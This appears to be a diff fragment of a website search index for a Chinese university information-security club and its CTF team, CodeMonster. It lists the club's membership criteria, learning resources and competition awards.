MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002
\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956
\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662
\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002
"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b
(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA
\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002
\u6211\u4eec\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d
\u7684\u6210\u7ee9\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00
\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b
\u662f\u4e00\u9879\u9762\u5411\u5927\u5b66\u751f\u7684\u516c\u76ca\u6027\u79d1\u6280\u7c7b\u7ade\u8d5b\uff0c\u7531\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u53d1\u8d77\u4e3b\u529e\uff0c\u901a\u8fc7\u6574\u5408\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u8d44\u6e90\u5bf9\u63a5\u9ad8\u6821\uff0c\u4e3a\u5927\u5b66\u751f\u63d0\u4f9b\u4e00\u4e2a\u8fdb\u884c\u4fe1\u606f\u5b89\u5168\u6280\u672f\u521b\u65b0\u3001\u6df1\u5165\u4ea7\u4e1a\u884c\u4e1a\u5e94\u7528\u4ee5\u53ca\u6269\u5c55\u5b89\u5168\u89c6\u91ce\u7684\u5e73\u53f0\uff0c\u63a8\u52a8\u6821\u4f01\u5408\u4f5c\u6a21\u5f0f\u7684\u4fe1\u606f\u5b89\u5168\u4eba\u624d\u57f9\u517b\uff0c\u4ece\u800c\u5b9e\u73b0\u4fe1\u606f\u5b89\u5168\u4f18\u79c0\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62e8\u6e20\u9053\u3002
\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002
\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002
\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002
\u672c\u534f\u4f1a\u7684CodeMonster
\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"\u83b7\u5956\u56fe\u7247\uff1a
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"11
"}]}
\ No newline at end of file
+{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002
\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn
"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63
\u5bf9\u8ba1\u7b97\u673a\u5b89\u5168\u6709\u7740\u6d53\u539a\u7684\u5174\u8da3
\u5bf9\u65b0\u4e8b\u7269\u6709\u7740\u5f3a\u70c8\u7684\u63a2\u7d22\u6b32\u671b
\u80fd\u591f\u5b8c\u6210\u6211\u4eec\u51fa\u7684\u65b0\u751f\u8d5b\u9898\uff08\u6821\u8d5b\uff09
\u80fd\u72ec\u7acb\u89e3\u51b3\u4e00\u9898\u5927\u578bCTF\u7ade\u8d5b\u7684\u9898
\u9ad8\u4e2d\u81ea\u5b66\u7b97\u6cd5\u6216\u53c2\u52a0\u8fc7\u7b97\u6cd5\u7ade\u8d5b
\u7834\u89e3\u8fc7\u67d0\u4e9b\u8f6f\u4ef6
\u5728CNVD\u3001EDUSRC\u3001HackerOne\u3001\u8865\u5929\u3001360\u3001\u963f\u91cc\u4e91\u5148\u77e5\u3001\u6216\u8005\u5728\u4f01\u4e1aSRC\uff08\u534e\u4e3a\u3001\u817e\u8baf\u3001B\u7ad9\uff09\u53d1\u8868\u6587\u7ae0\u6216\u8005\u6316
\u6398\u5e76\u63d0\u4ea4\u6f0f\u6d1e\u62a5\u544a
\u72ec\u81ea\u7814\u7a76\u8fc7\u53ef\u4fe1\u6280\u672f\u3001\u91cf\u5b50\u5b89\u5168\u3001\u4eba\u5de5\u667a\u80fd\u5b89\u5168\u3001\u5de5\u4e1a\u63a7\u5236\u5b89\u5168
\u2026\u6216\u662f\u5176\u4ed6\u4efb\u4f55\u548c\u4fe1\u606f\u5b89\u5168\u6709\u5173\u7684\u4e8b\u60c5\u3002
"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":" \u7ebf\u4e0a\u81ea\u5b66
\u534f\u4f1a\u5b66\u4e60\u5e73\u53f0\uff1ahttps://cloud.xmutsec.cn
\u5b66\u4e60\u8d44\u6599\uff1ahttps://ctf-wiki.github.io/ctf-wiki/
\u5237\u9898
\u901b\u5927\u4f6c\u4eec\u7684\u535a\u5ba2
\u575a\u6301
\u575a\u6301
\u575a\u6301
\u534f\u4f1a\u7f51\u76d8\u91cc\u62e5\u6709\u5b66\u4e60\u7f51\u7edc\u5b89\u5168\u7684\u6240\u6709\u8d44\u6599\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u4e0b\u8f7d\u5b66\u4e60\uff0c\u5982\u9047\u5230\u56f0\u96be\u53ef\u5148\u81ea\u884c\u89e3\u51b3\uff08\u6ce8\u610f\u7ffb\u9605\u300a\u63d0\u95ee\u7684\u667a\u6167\u300b\uff09\uff0c\u89e3\u51b3\u4e0d\u4e86\u7684\u5728\u5411\u5b66\u957f\u6216\u5b66\u59d0\u53d1\u8d77\u63d0\u95ee\uff0c\u7406\u5de5\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6b22\u8fce\u5168\u6821\u540c\u5b66\u7684\u5230\u6765\uff0c\u534f\u4f1a\u6bcf\u5b66\u671f\u4f1a\u4e3e\u529e\u4e00\u573a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff0c\u7528\u4e8e\u6218\u961f\u9009\u62d4\uff0c\u83b7\u5f97\u5956\u9879\u7684\u540c\u5b66\u5373\u53ef\u52a0\u5165XMUTSEC\u6216CodeMonster\u6218\u961f\uff0c\u53c2\u4e0e\u5b66\u672f\u7ade\u8d5b\u548c
"},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":" [2022\u5e7411\u670819\u65e5] - 2022\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2022\u5e7409\u670806\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b\u4e2d\u83b7\u4e09\u7b49\u5956
[2022\u5e7407\u670807\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u534e\u4e1c\u5357\u5206\u533a\u8d5b\u4e2d\u559c\u83b7\u4f73\u7ee9
[2021\u5e7412\u670811\u65e5] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u843d\u4e0b\u5e37\u5e55
[2019\u5e7409\u670816\u65e5] - \u6211\u9662\u5b66\u5b50\u57282019\u5e74\u201c\u9ed1\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u77e5\u8bc6\u548c\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\u83b7\u5168\u7701\u4e9a\u519b
[2018\u5e7412\u670819\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u56db\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e8c\u540d
[2018\u5e7412\u670810\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1-i\u6625\u79cb\u201d\u676f\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u5b8c\u6ee1\u7ed3\u675f
[2018\u5e7411\u670815\u65e5] - \u6211\u9662\u5b66\u5b50\u57282017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u53d6\u5f97\u4f18\u5f02\u6210\u7ee9
[2017\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4e2d\u83b7\u5168\u7701\u7b2c\u4e09\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u56e2\u961f\u5728\u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u4e2d\u52c7\u593a\u5168\u7701\u7b2c\u4e8c\u540d
[2017\u5e7412\u670808\u65e5] - \u6211\u9662CodeMonster\u4fe1\u606f\u5b89\u5168\u56e2\u961f\u5728\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u83b7\u4f73\u7ee9
[2017\u5e7405\u670815\u65e5] - \u53a6\u95e8\u7406\u5de5\u5b66\u9662\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\u5706\u6ee1\u843d\u5e55
[2017\u5e7405\u670807\u65e5] - \u6211\u9662\u987a\u5229\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u4fe1\u606f\u5b89\u5168\u6821\u8d5b\u603b\u51b3\u8d5b
[2017\u5e7404\u670828\u65e5] - \u6211\u9662\u5b66\u5b50\u5728\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u4e2d\u559c\u83b7\u5b63\u519b
[2016\u5e7412\u670814\u65e5] - \u6211\u9662\u5b66\u5b50\u559c\u83b7\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u4f73\u7ee9
"},{"location":"award/#_3","title":"\u4e3b\u529e","text":" [2022/11/04] - 2022\u5e74 SkyNICOCTF \u66a8\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u56db\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2022/05/??] - 2022\u5e74CMCTF-5\uff08AWD\uff09\u7ebf\u4e0a\u653b\u9632\u5bf9\u6297\u8d5b [2022/04/??] - 2022\u5e74CMCTF-4\uff08CTF\uff09\u6bd4\u8d5b [2021/10/??] - 2021\u5e74\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u7b2c\u4e09\u5c4a\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b [2018/??/??] - 2018\u5e74\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b [2018/02/13] - \u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u2642\u2642\u2642 [2017/05/06] - \u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b "},{"location":"award/#2023","title":"2023","text":" [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b \u4e00\u7b49\u5956\uff08\u7b2c5\u540d\uff09 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/26] - \u7b2c\u5341\u516d\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u5de5\u63a7\u5b89\u5168\u6311\u6218\u521b\u65b0\u5355\u9879\u5956 \u5730\u70b9\uff1a\u5b89\u5fbd\u5408\u80a5\uff0c\u4e2d\u56fd\u4e66\u6cd5\u5927\u53a6 [2023/07/04] - 2023\u5e74\u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\u51b3\u8d5b \u5730\u70b9\uff1a\u91cd\u5e86\uff0c\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2023/06/27] - \u7b2c\u4e09\u5c4a\u4e2d\u56fd\uff08\u6c88\u9633\uff09\u667a\u80fd\u7f51\u8054\u6c7d\u8f66\u5927\u8d5b\u51b3\u8d5b\uff08\u667a\u80fd\u7f51\u8054\u6c7d\u8f66 \"\u5929\u878d\u4fe1\u676f\" \u4fe1\u606f\u5b89\u5168\u653b\u9632\u8d5b\uff09\u521d\u8d5b12\u540d 
